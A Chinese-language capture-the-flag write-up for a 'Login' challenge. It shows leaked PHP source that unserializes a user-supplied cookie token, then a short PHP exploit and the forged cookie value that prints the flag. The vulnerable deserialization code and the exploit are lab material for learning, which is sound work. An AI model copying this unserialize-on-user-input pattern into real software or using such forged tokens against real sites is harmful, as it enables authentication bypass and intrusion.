# [春秋云实企安殿]Login


#  [春秋云实企安殿]Login

在页面源代码中拿到账号密码：`test1/test1`

![image-20240309163918215](http://cdn.wutongliran.top/img/image-20240309163918215.png)

登陆上来到这里

![image-20240309164000471](http://cdn.wutongliran.top/img/image-20240309164000471.png)

查看数据包，看到返回包中有可疑参数 `show`

![image-20240309164236738](http://cdn.wutongliran.top/img/image-20240309164236738.png)

重新发送数据包，在请求头里添上`show:1`，得到 member.php 的后端源码

![image-20240309164510162](http://cdn.wutongliran.top/img/image-20240309164510162.png)

```php
<?php
	include 'common.php';
	$requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
	class db
	{
		public $where;
		function __wakeup()
		{
			if(!empty($this->where))
			{
				$this->select($this->where);
			}
		}

		function select($where)
		{
			$sql = mysql_query('select * from user where '.$where);
			return @mysql_fetch_array($sql);
		}
	}

	if(isset($requset['token']))
	{
		$login = unserialize(gzuncompress(base64_decode($requset['token'])));
		$db = new db();
		$row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
		if($login['user'] === 'ichunqiu')
		{
			echo $flag;
		}else if($row['pass'] !== $login['pass']){
			echo 'unserialize injection!!';
		}else{
			echo "(╯‵□′)╯︵┴─┴ ";
		}
	}else{
		header('Location: index.php?error=1');
	}
?>
```

想要输出 flag ，需要注意以下代码

```php
if(isset($requset['token']))
	{
		$login = unserialize(gzuncompress(base64_decode($requset['token'])));
		if($login['user'] === 'ichunqiu')
		{
			echo $flag;
		}
```

exp

```php
<?php
$a = array('user' => 'ichunqiu');
$a = base64_encode(gzcompress(serialize($a)));
echo $a;
?>
//运行得到 eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==
```

在 cookie 里加上`token=eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==`

![image-20240309171939066](http://cdn.wutongliran.top/img/image-20240309171939066.png)